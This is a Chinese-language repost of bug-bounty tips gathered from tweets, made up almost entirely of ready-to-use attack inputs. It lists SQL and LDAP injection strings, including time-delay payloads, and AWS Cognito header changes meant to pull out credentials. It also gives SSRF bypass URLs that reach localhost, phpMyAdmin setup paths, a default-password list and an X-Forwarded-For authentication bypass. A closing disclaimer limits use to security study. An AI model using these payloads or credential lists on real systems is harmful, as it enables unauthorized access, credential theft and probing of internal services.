快速检测有无SQL注入
' OR 1=1--
' OR 1=0--
%27%20or%201=1
*(|(object=*))
)%20or%20('x'='x
%20or%201=1
1) or pg_sleep(__TIME__)--
/**/or/**/1/**/=1
' or username like '%
);waitfor delay '0:0:__TIME__'--
or isNULL(1/0) /*
x' or 1=1 or 'x'='y
来源:https://twitter.com/_bughunter/status/1521830121270910977?s=20&t=VSyAza5nbjxnUqIw5N9Wyw
X-AMZ-Target:AWSCognitoIdentityProviderService.ConfirmSignUp
X-AMZ-Target:AWSCognitoIdentityProviderService.GetUser
获取凭证访问密钥 ID 和密钥 将标头更改为这样并观察响应
X-AMZ-TARGET:AWSCognitoIdentityService.GetCredentialsForIdentity
来源:
https://threadreaderapp.com/thread/1522086964262051841.html
SSRF Bypasses
http://0.0.0.0
http://0
http://0x7f000001
http://2130706433
http://0000::1
http://0000::1:25
http://0000::1:22
http://0000::1:3128
http://2130706433
http://3232235521
http://3232235777
http://2852039166
http://0o177.0.0.1
来源:https://twitter.com/_bughunter/status/1521833353015709698?s=20&t=VSyAza5nbjxnUqIw5N9Wyw
当默认凭据在#phpmyadmin登录时不起作用时,我会尝试访问这些路径
admin/phpMyAdmin/setup/index.php
phpMyAdmin/main.php
phpmyadmin/pma/
Admin/setup/index.php
phpmyadmin/admin/setup/index.php
phpmyadmin/setup/
phpmyadmin/setup/index.php
来源:https://twitter.com/tamimhasan404/status/1522814723271512065?s=20&t=lpTy2cTCgvIjmJ9JyE7-8Q
admin:admin
admin:a
admin:12346578
test:test
guest:guest
anonymous:anonymous
admin:password
admin:
root:toor
root:passw0rd
root:root
guest:test
$sub_name:password
ADMIN:ADMIN
Admin:Admin
:
a:a
来源:https://twitter.com/_bughunter/status/1521374403761745920?s=20&t=aInLegLknUcam2qSjbt2PA
Authentication bypass....
Using custom header (See attached screenshot):
X-Forwarded-For: 127.0.0.1
来源:https://twitter.com/BountyOverflow/status/1523264249442627590?s=20&t=aInLegLknUcam2qSjbt2PA
文章来源:Hack学习呀
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END
多一个点在看多一条小鱼干